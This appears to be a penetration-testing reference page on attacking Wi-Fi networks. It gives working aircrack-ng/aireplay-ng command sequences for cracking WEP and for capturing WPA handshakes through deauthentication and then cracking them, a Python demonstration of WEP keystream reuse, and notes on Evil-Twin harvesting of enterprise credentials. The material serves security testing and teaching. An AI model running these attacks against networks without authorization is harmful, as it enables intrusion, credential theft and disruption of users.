# Wireless pentest

## Open network

* Usually provided for guest access and limited to internet access; traffic is sent in the clear, so check for client isolation and whether the guest network can reach anything internal
* Guests either connect directly or must first authenticate through a captive portal

## WEP

* This protocol has been completely broken for many years and should not be used anymore.
* The key can be recovered in minutes from captured traffic: the 24-bit IV prepended to the static RC4 key repeats quickly and leaks the key statistically (the PTW attack implemented in aircrack-ng)

```bash
# Capture IVs: tens of thousands are needed (PTW needs roughly 20 000 for a 40-bit key, 40 000 to 85 000 for a 104-bit key)
airodump-ng -c 11 --bssid 60:A4:4C:20:DF:60 -w out wlan0mon
# Generate ARP traffic: replay captured ARP requests so the AP answers with new IVs
# (-b is the target BSSID, -h our card's MAC, which must be associated: a real client's MAC or a fake authentication first)
aireplay-ng -3 -b 60:A4:4C:20:DF:60 -h 44:60:57:C8:58:A0 wlan0mon
# Monitor the number of IVs collected (also visible in the #Data column of airodump-ng)
aircrack-ng out-01.cap
# Break the key once enough IVs are in (PTW is the default method)
aircrack-ng -b 60:A4:4C:20:DF:60 out-01.cap
```
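The design flaw that the IV harvesting above exploits, as an added example written for this page (not code from the original page or from aircrack-ng): WEP builds the per-packet RC4 key as IV || static key, with the IV sent in the clear. The key, IV and frames below are constructed test data; the LLC/SNAP header is the real known plaintext at the start of every ARP frame. The block shows keystream reuse and known-plaintext keystream recovery; the PTW statistical key recovery that aircrack-ng runs on top of these keystream bytes is not reimplemented here.

```python
import math
import zlib

# LLC/SNAP header that opens every ARP frame on 802.11: known plaintext the attacker can rely on
ARP_SNAP_HEADER = bytes.fromhex("aaaa030000000806")


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA) then the pseudo-random generator (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV (clear) | key index | RC4_{IV||key}(plaintext || CRC32 ICV)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    keystream = rc4_keystream(iv + wep_key, len(plaintext) + 4)
    return iv + b"\x00" + xor(plaintext + icv, keystream)


def wep_decrypt(wep_key: bytes, frame: bytes) -> bytes:
    """Legitimate receiver: regenerate the keystream from the clear IV and the shared key."""
    iv, body = frame[:3], frame[4:]
    data = xor(body, rc4_keystream(iv + wep_key, len(body)))
    plaintext, icv = data[:-4], data[-4:]
    if zlib.crc32(plaintext).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return plaintext


def keystream_from_known_plaintext(frame: bytes, known_prefix: bytes) -> bytes:
    """Attacker: ciphertext XOR known plaintext = keystream bytes for this IV, no key needed."""
    return xor(frame[4:], known_prefix)


def decrypt_with_reused_iv(frame: bytes, keystream: bytes) -> bytes:
    """Any other frame sent under the same IV leaks its first len(keystream) bytes."""
    return xor(frame[4:], keystream)


def expected_frames_until_iv_collision() -> int:
    """Birthday bound on a 24-bit IV space: a busy AP repeats an IV after a few thousand frames."""
    return int(math.sqrt(2 * 2**24 * math.log(2)))


# --- constructed demo: one AP, one static key, the same IV used for two frames ---
WEP_KEY = bytes.fromhex("0123456789")  # made-up 40-bit key
IV = bytes.fromhex("a1b2c3")           # made-up IV that the AP reuses
ARP_PAYLOAD = bytes.fromhex("000108000604000160a44c20df60c0a80101000000000000c0a80164")
arp_request = wep_encrypt(WEP_KEY, IV, ARP_SNAP_HEADER + ARP_PAYLOAD)
other_frame = wep_encrypt(WEP_KEY, IV, b"password=hunter2 sent under the same IV")


def demo() -> bytes:
    """Recover 8 keystream bytes from the ARP frame, then read the start of the other frame."""
    ks = keystream_from_known_plaintext(arp_request, ARP_SNAP_HEADER)
    return decrypt_with_reused_iv(other_frame, ks)


if __name__ == "__main__":
    print(demo())
    print("frames until an IV repeat (50% chance):", expected_frames_until_iv_collision())
```

This is exactly why `aireplay-ng -3` replays ARP: every reply is a frame whose first eight plaintext bytes are known, so each new IV hands the attacker eight keystream bytes derived from `IV || key`, which is the input PTW needs.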

## WPA

* 2 authentication modes:
  * Personal = WPA-PSK (Pre-Shared Key): authentication by a single secret shared with everyone (like at home). The passphrase itself never crosses the air, but a captured 4-way handshake (or a PMKID) is enough to test candidate passphrases offline.
  * Enterprise = WPA MGT (the `MGT` label airodump-ng shows in its AUTH column for 802.1X networks) = EAP (Extensible Authentication Protocol). Several EAP methods exist (see the official list on the IANA website); the most common are:
    * PEAP: historically the method best supported natively by Windows. It runs an inner MSCHAPv2 exchange inside a TLS tunnel, so an Evil-Twin AP with a rogue RADIUS server receives the client's AD username and MSCHAPv2 challenge/response (crackable offline with hashcat mode 5500, the same format as NetNTLMv1), provided the client does not validate the server certificate.
    * EAP-TTLS: very similar; the inner method can be plain login/password (PAP), which an Evil-Twin recovers in clear text if the clients do not check the certificate of the access point.
    * EAP-TLS: mutual authentication by certificate; an Evil-Twin has nothing to harvest, since the client must present a valid certificate.

### The Hacking process

![image](https://user-images.githubusercontent.com/96747355/176039405-619013ff-b308-4ae9-8fcc-80678c51e275.png)

> *Source:* [*Practical Ethical Hacking - TCM Security*](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)

```bash
# check that the wireless card is detected
iwconfig
# bring the interface down before changing its mode
ifconfig wlan0 down
# kill the processes (NetworkManager, wpa_supplicant) that would interfere with monitor mode
airmon-ng check kill
# put the card in monitor mode
iwconfig wlan0 mode monitor
# bring it back up
ifconfig wlan0 up
```

#### OR

```bash
# check that the wireless card is detected
iwconfig
# kill the processes (NetworkManager, wpa_supplicant) that would interfere with monitor mode
airmon-ng check kill
# put the card in monitor mode (creates the wlan0mon interface)
airmon-ng start wlan0
# check that it worked
iwconfig
# find the SSID in our scope for the test
airodump-ng wlan0mon
# monitor our target for handshakes: -c is the channel number and --bssid the AP MAC address, both found with the previous command
airodump-ng -c <channel-number> --bssid <MAC-ADDRESS> -w capture wlan0mon
# send a deauth burst to a connected station so it reconnects and we capture the 4-way handshake
# (-0 1 = one burst; airodump-ng shows "WPA handshake: <MAC-ADDRESS>" in its top line once captured)
aireplay-ng -0 1 -a <MAC-ADDRESS> -c <MAC-ADDRESS-STATION> wlan0mon
# check our capture .cap file to crack the handshake
ls capture*
# crack the handshake with a wordlist
aircrack-ng -w wordlist -b <MAC-ADDRESS> capture-01.cap
```

## Tools

* [Wifite](https://github.com/derv82/wifite2)
* [Fluxion](https://github.com/FluxionNetwork/fluxion)
* [EAPHammer](https://github.com/s0lst1c3/eaphammer)

## Equipment

* The following equipment can be used for wifi pentests (the card must support monitor mode and packet injection):
  * Alfa AWUS036NH
  * Alfa AWUS1900
  * Alfa AWUS036ACH
  * Alfa AWUS052NH
  * Alfa AWUS051NH
  * Alfa AWUS036NHR
  * TP-Link TL-WN722N (v1; later hardware revisions need out-of-tree drivers for monitor mode)
  * Hak5 Pineapple Nano Basic
  * Flipper Zero along with the wifi dev board

## Resources

{% embed url="<https://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet/>" %}
Wireless pentest checklist
{% endembed %}

{% embed url="<https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/>" %}
PWNING WPA/WPA2 NETWORKS WITH BETTERCAP AND THE PMKID CLIENT-LESS ATTACK - on evilsocket
{% endembed %}

{% embed url="<https://www.aircrack-ng.org/doku.php?id=cracking_wpa>" %}
How to Crack WPA/WPA2
{% endembed %}

{% embed url="<https://www.wirelesshack.org/>" %}
WirelesSHack
{% endembed %}

{% embed url="<https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course>" %}
Practical Ethical Hacking - TCM Security
{% endembed %}

